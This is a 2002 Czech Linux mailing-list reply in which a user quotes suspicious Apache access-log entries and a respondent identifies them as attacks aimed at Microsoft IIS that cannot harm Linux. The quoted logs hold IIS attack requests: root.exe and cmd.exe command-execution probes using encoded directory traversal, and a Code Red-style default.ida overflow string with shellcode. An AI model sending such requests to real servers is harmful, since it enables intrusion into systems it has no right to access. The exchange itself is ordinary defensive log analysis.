Apache logy -- hack -- bespecnost

Tomas Valousek xvalous na pluto.pslib.cz
Úterý Únor 19 19:45:24 CET 2002 

On Tue, 19 Feb 2002 adam_1 na centrum.cz wrote:

> Hello linux,
> 
>   Dobry den kdyz jsem si dnes prochazel logy z Apache tak jsem narazil
>   na nektere veci ktere se mi docela nezdaji nesel by se tu nekdo zvas
>   kdo by mi rekl kdo a o co se pokousel. Popripade jestli se necim
>   takovym da zmocnit /bin/bash (nechci rici root protoze staci i jiny
>   uzivatel a pres neho je otazka par hodin se dostat k root). V
>   pripade ze se nejakym timto spusobem da dostat dovnitr jaka je
>   obrana?
> Tohle jsem nasel v souboru /var/log/httpd/access_log
> ----------------------------------------------------------------------------------
> 212.32.196.115 - - [18/Feb/2002:19:48:11 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:12 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:19 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:30 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
> 212.90.237.190 - - [18/Feb/2002:20:34:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
> 213.10.1.40 - - [19/Feb/2002:11:56:40 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 322 "-" "-"

Toto je nekolik zpusobu jak se dostat na IIS (to je takovyto tamto od 
tamtech na tamto). Linux to zcela urcite nemuze ohrozit ;-).

BTW: kdyz zadate cast toho pozadavku do guglu tak to najde podrobnejsi 
informace o techto vecech

-- 
	Tomas -VALY- Valousek
	web design, internet projects, linux etc..
email: tomas na valousek.cz
www:   http://www.pslib.cz/~xvalous 	(~=ALT+126)

Další informace o konferenci Linux